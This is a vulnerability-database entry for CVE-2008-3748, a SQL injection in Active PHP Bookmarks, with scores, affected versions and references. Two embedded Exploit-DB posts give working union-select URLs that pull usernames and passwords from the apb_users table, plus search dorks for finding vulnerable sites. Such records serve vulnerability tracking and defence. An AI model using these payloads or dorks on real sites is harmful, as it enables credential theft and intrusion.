CVE-2008-3748
published 2008-08-21CVE-2008-3748: SQL injection vulnerability in view_group.php in Active PHP Bookmarks (APB) 1.1.02 and 1.2.06 allows remote attackers to execute arbitrary SQL commands via the…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.8th percentile
SQL injection vulnerability in view_group.php in Active PHP Bookmarks (APB) 1.1.02 and 1.2.06 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lbstone | active_php_bookmarks | — | — |
| lbstone | active_php_bookmarks | — | — |
| lbstone | apb | — | — |
| lbstone | apb | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Active PHP BookMarks 1.3 - SQL Injection
exploitdb·2009-12-22
CVE-2008-3748 Active PHP BookMarks 1.3 - SQL Injection
Active PHP BookMarks 1.3 - SQL Injection
---
# Title: Active PHP Bookmarks v1.3 Remote SQL Injection Vulnerability
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mr.Elgaarh
# Published: 2009-12-21
~ Author : Mr.Elgaarh
~ Email : [email protected]
~ Home : http://securityreason.com/
Dork : "Powered by Active PHP Bookmarks v1.3" inurl:.view_group.php?id=
./Exploit:
first search for the admin username :
ex : http://server/path/view_group.php?id=-4
ex : http://[Target.com]/path/view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users--
admin panel path : http://server/path/cookie_auth.php?action=cookie_login
Greets : Mado - Dr.Hacker - Mr.Max - broken proxy - Offensive Security - AG-Spider - ISlamic Defenders Crew -
Exploit-DB
Active PHP BookMarks 1.1.02 - SQL Injection
exploitdb·2008-08-19
CVE-2008-3748 Active PHP BookMarks 1.1.02 - SQL Injection
Active PHP BookMarks 1.1.02 - SQL Injection
---
|___________________________________________________|
|
| Bookmarks V 1.1.02 (id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
| |
|
| script : http://lbstone.com/apb/?version=1.1.02
|
| DorK : Powered by Active PHP Bookmarks v1.1.02
|
| DorK : inurl:bookmarks/view_group.php?id=
|___________________________________________________|
Exploit:
www.[target].com/Script/view_group.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users--
____________________________( Greet
No writeups or analysis indexed.
http://secunia.com/advisories/31544http://securityreason.com/securityalert/4174http://www.securityfocus.com/bid/30757https://exchange.xforce.ibmcloud.com/vulnerabilities/44548https://www.exploit-db.com/exploits/6277http://secunia.com/advisories/31544http://securityreason.com/securityalert/4174http://www.securityfocus.com/bid/30757https://exchange.xforce.ibmcloud.com/vulnerabilities/44548https://www.exploit-db.com/exploits/6277
2008-08-21
Published